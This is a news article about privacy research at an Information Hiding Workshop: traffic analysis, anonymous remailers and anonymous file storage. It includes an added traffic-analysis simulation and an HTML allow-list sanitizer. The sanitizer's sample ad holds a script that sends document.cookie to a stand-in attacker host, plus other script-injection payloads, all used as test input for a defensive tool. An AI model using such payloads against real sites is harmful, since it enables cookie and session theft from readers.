You Can Hide From Prying Eyes

Researchers at the Information Hiding Workshop present technologies designed to help you shield your online identity. By Declan McCullagh.

PITTSBURGH, Pennsylvania -- It's a refrain so common it's unremarkable: Privacy is dead on the Net, and being able to shield your identity online is about as likely as winning the lottery. Twice.

Just don't tell that to the researchers who gathered this week for the fourth Information Hiding Workshop, an event that's on the front lines of the pitched battle over anonymity vs. traceability.

These roughly 100 scientists, engineers, and mathematicians don't want you to have to rely on the law to shield your online identity from prying eyes. After all, laws can change, some countries lack legal protection, and even websites you trust may surreptitiously leak information or suffer security breaches.

Instead, they believe, anonymity-enhancing technologies should allow you to not hand over personal information in the first place: Call it the minimalist approach to privacy.

On Thursday, Ulf Moeller, a researcher at Zero Knowledge Systems in Montreal, described the company's ongoing efforts to improve its Freedom product, which provides privacy-protected Web surfing and e-mail.

He said that while Freedom is relatively speedy and not vulnerable to denial-of-service attacks, it is somewhat more prone to "traffic analysis."

No, he's not talking about counting cars on highways. He means that someone who wanted to know whether Alice is sending e-mail to Bob could -- with an interception system such as the FBI's Carnivore -- record when traffic leaves Alice's computer and when traffic arrives at Bob's.

The e-mail may be encrypted so the FBI can't read the contents, but if something arrives at Bob shortly after each message leaves Alice, the timing alone tells the watcher that the two are corresponding -- which defeats the purpose of Freedom.

"Users who are worried that the NSA is trying to monitor them would not be advised to use this system," Moeller said. He added that only government agencies would likely have the resources to conduct such extensive surveillance, however.

Moeller said one solution would be for the Freedom software to send lots of fake messages to Bob, a procedure called link padding, so the NSA or FBI couldn't tell when Alice includes one in the stream as well. The downside: That eats a lot of bandwidth, and wouldn't work well on a dial-up connection.
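To make the timing attack and the link-padding countermeasure concrete, here is an added simulation written for this page; it is not code from Zero Knowledge Systems or the Freedom product. It constructs message times for Alice and for a third party who also writes to Bob, applies an assumed network delay of 0.5 to 2 seconds, and scores how often a departure at Alice is followed within three seconds by an arrival at Bob. It then repeats the measurement with both links padded to one fixed-size cell every ten seconds. The message counts, delays, window and cell rate are all assumptions chosen for illustration.

```python
import math
import random

WINDOW = 3.0  # seconds: an arrival this soon after a departure counts as a match


def random_times(rng, n, span):
    """Constructed sample: n message times spread uniformly over `span` seconds."""
    return sorted(rng.uniform(0.0, span) for _ in range(n))


def deliver(send_times, rng, lo=0.5, hi=2.0):
    """Assumed per-message network delay of lo..hi seconds (illustrative)."""
    return sorted(t + rng.uniform(lo, hi) for t in send_times)


def correlation_score(sends, receives, window=WINDOW):
    """Fraction of departures from Alice that are followed, within `window`
    seconds, by an arrival at Bob.  This is the crude timing test an observer
    who taps both ends, but cannot read the encrypted contents, would run.
    Both lists must be sorted ascending."""
    if not sends:
        return 0.0
    hits, j = 0, 0
    for t in sends:
        while j < len(receives) and receives[j] < t:
            j += 1                      # skip arrivals that precede this departure
        if j < len(receives) and receives[j] - t <= window:
            hits += 1
    return hits / len(sends)


def unpadded(talking, n=200, span=12000.0, seed=1):
    """Ordinary encrypted e-mail: each real message shows up as one packet
    leaving Alice and, a moment later, one arriving at Bob."""
    rng = random.Random(seed)
    alice = random_times(rng, n, span)
    other = random_times(rng, n, span)   # a third party who also writes to Bob
    bob = deliver(alice if talking else other, rng)
    return correlation_score(alice, bob)


def padded(talking, n=200, span=12000.0, cell_gap=10.0, seed=1):
    """Link padding: Alice's link and Bob's link each carry one fixed-size
    cell every `cell_gap` seconds no matter what.  A real message rides the
    next cell out of Alice, then the next cell into Bob after it reaches the
    mix; every other cell is a dummy.  Returns what the observer measures
    (score), how much was actually transmitted (cells) and what got through."""
    rng = random.Random(seed)
    bob_phase = rng.uniform(0.0, cell_gap)   # Bob's link runs on its own clock
    written = random_times(rng, n, span) if talking else []
    n_cells = int((span + 10 * cell_gap) / cell_gap)
    alice_cells = [k * cell_gap for k in range(n_cells)]
    bob_cells = [bob_phase + k * cell_gap for k in range(n_cells)]
    delivered = 0
    for w in written:
        leaves = math.ceil(w / cell_gap) * cell_gap            # next cell out of Alice
        at_mix = leaves + rng.uniform(0.5, 2.0)                 # same assumed delay
        bob_cell = bob_phase + math.ceil((at_mix - bob_phase) / cell_gap) * cell_gap
        if bob_cell <= bob_cells[-1]:
            delivered += 1
    return {"score": correlation_score(alice_cells, bob_cells),
            "cells": n_cells, "sent": len(written), "delivered": delivered}


if __name__ == "__main__":
    print("no padding, Alice writes Bob:         ", unpadded(True))
    print("no padding, Bob hears from a third party:", unpadded(False))
    print("padded, Alice writes Bob:             ", padded(True))
    print("padded, Alice writes nobody:          ", padded(False))
```

Without padding the score separates the two cases cleanly: 1.0 when Alice writes Bob, a few percent when Bob's mail comes from someone else. With padding the observer sees an identical cell schedule on both links whether or not Alice is writing, so the score is the same in both cases and carries no information; the price is the cell count, roughly six cells transmitted for every real message at these rates, which is the bandwidth cost that makes the scheme impractical on a dial-up link.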

"If anybody could come up with answers, we would be very pleased to hear from you," Moeller told the audience.

Another paper described how Java and Javascript can -- unless website designers are extraordinarily cautious -- expose information about someone hoping to remain anonymous on a dating service.

Richard Clayton, a PhD student at Cambridge University, showed how Java code embedded in an "about me" personals ad can reveal information about the Internet address of whoever reads it -- which defeats the purpose of an anonymous matchmaking site.

"The sandbox of Javascript isn't terribly good," said Clayton, who co-authored the paper with George Danezis and Markus Kuhn. "But the mere fact that it is on your machine allows it to pick up certain things from your environment."

A more elaborate version of the Java attack can let an attacker capture someone's cookies and possibly find out their real name, Clayton said. He said his colleagues demonstrated it on a matchmaking site, but many sites that allow users to post HTML could be vulnerable. (The solution, for all you webmasters: Don't just filter script tags from your users' HTML posts; applets, event-handler attributes and javascript: links carry the same payload. Allow a short list of harmless tags and throw away everything else. Ruthlessly.)
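
As an added illustration of that webmaster advice (this is not code from the paper or from any matchmaking site), here is an allow-list sanitizer in Python for user-posted HTML. Rather than hunting for script tags, it rebuilds the ad from scratch and keeps only an assumed short list of formatting tags plus an href restricted to http, https and mailto; the tag list, the sample ad and the attacker.example host are assumptions made for the example.

```python
from html import escape
from html.parser import HTMLParser

# Assumed policy for a personals site (not any real site's rules):
# plain formatting and links only.  Anything not listed here is dropped.
ALLOWED_TAGS = {"p", "br", "b", "i", "em", "strong", "ul", "ol", "li", "a"}
ALLOWED_ATTRS = {"a": {"href"}}
VOID_TAGS = {"br"}
SAFE_URL_PREFIXES = ("http://", "https://", "mailto:")
DROP_WITH_CONTENT = {"script", "style"}   # their text must not leak through either


class AllowlistSanitizer(HTMLParser):
    """Rebuilds user-supplied HTML from scratch, keeping only allow-listed tags
    and attributes.  <script>, <applet>, <object>, <embed>, <iframe>, on*
    event handlers and javascript: URLs never reach the output because they
    were never on the list; there is no blocklist to slip past."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.skip_depth = 0      # > 0 while inside script/style: drop the text too
        self.open_tags = []      # tags we emitted and still owe a closing tag

    def handle_starttag(self, tag, attrs):
        if tag in DROP_WITH_CONTENT:
            self.skip_depth += 1
            return
        if self.skip_depth or tag not in ALLOWED_TAGS:
            return
        kept = []
        for name, value in attrs:
            if value is None or name not in ALLOWED_ATTRS.get(tag, set()):
                continue         # drops onmouseover=, style=, and every other attribute
            if name == "href" and not value.strip().lower().startswith(SAFE_URL_PREFIXES):
                continue         # rejects javascript:, data:, vbscript: and friends
            kept.append(f' {name}="{escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")
        if tag not in VOID_TAGS:
            self.open_tags.append(tag)

    def handle_endtag(self, tag):
        if tag in DROP_WITH_CONTENT:
            self.skip_depth = max(0, self.skip_depth - 1)
            return
        if self.skip_depth or tag not in self.open_tags:
            return
        while self.open_tags:    # close unclosed children so output stays well-formed
            top = self.open_tags.pop()
            self.out.append(f"</{top}>")
            if top == tag:
                break

    def handle_data(self, data):
        if not self.skip_depth:
            self.out.append(escape(data, quote=False))   # re-escape < > & in text

    def handle_comment(self, data):
        pass                     # comments, including conditional ones, are dropped

    def result(self):
        while self.open_tags:
            self.out.append(f"</{self.open_tags.pop()}>")
        return "".join(self.out)


def sanitize(user_html):
    """Return a version of user_html containing only allow-listed markup."""
    p = AllowlistSanitizer()
    p.feed(user_html)
    p.close()
    return p.result()


if __name__ == "__main__":
    # Constructed "about me" ad carrying the kinds of payload the paper warns about.
    AD = ('<p>Hi, I like <b onmouseover="alert(document.cookie)">hiking</b>.</p>'
          '<script>new Image().src="http://attacker.example/?c="+document.cookie</script>'
          '<applet code="Leak.class"></applet>'
          '<a href="javascript:alert(1)">write me</a> '
          '<a href="https://example.org/profile/42">my page</a>')
    print(sanitize(AD))
```

The point of the allow-list design is that a blocklist has to enumerate every vehicle for active content (applet, object, embed, iframe, every on* attribute, javascript: and data: URLs, and whatever the next browser adds) and is beaten the moment one is missed, while an allow-list only has to name what is harmless. Run it on the server when the ad is posted, and remember it protects the reader only from code that runs automatically; a link the reader chooses to follow still takes the reader's own browser to the attacker's server.
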

A team of computer scientists from Cambridge, Massachusetts, offered a way to improve the Internet's anonymous mail infrastructure. The Mixmaster network of remailers, which strip the headers that identify the sender and then forward your mail anonymously, has been around for years -- but because volunteers operate them without charging, service is spotty.

In a paper called "A Reputation System to Increase MIX-net Reliability," the researchers say that the solution is to add a kind of automated consumer-reports tracking of remailer performance. Reliable remailers will be scored highly, while poor performers that crash frequently will get poor scores.

One rating service already exists, but because the remailer operators know who runs it, they may decide to treat its messages better than ones sent by an average user. It's a problem similar to the one that restaurant or hotel reviewers face, say co-authors Roger Dingledine and David Molnar.

The solution: Change the mixmaster system to provide receipts for mail delivery, kind of a certified delivery standard, and permit third-party "witnesses" to monitor the performance of the system.

One presentation that's sure to rile an entertainment industry already irate about Napster and DeCSS is by Tonda Benes of Charles University in Prague.

Called the Strong Eternity Service, it represents the next generation in anonymous file storage and trading, and builds on an earlier idea by Cambridge University reader Ross Anderson.

Unlike Anderson's earlier idea, this system allows payment for anonymous information retrieval and storage -- just what Hollywood fears will happen once more content, such as movies, becomes readily available online.

The Strong Eternity Service is designed to be as difficult as possible to trace even illicit, copyrighted, or obscene files that are inserted into the network. "It seems very difficult to perform a selective attack directed against the servers that store particular information," the paper says.

In a dramatic understatement, Benes says that its "features have strong impact to contemporary view of intellectual property rights."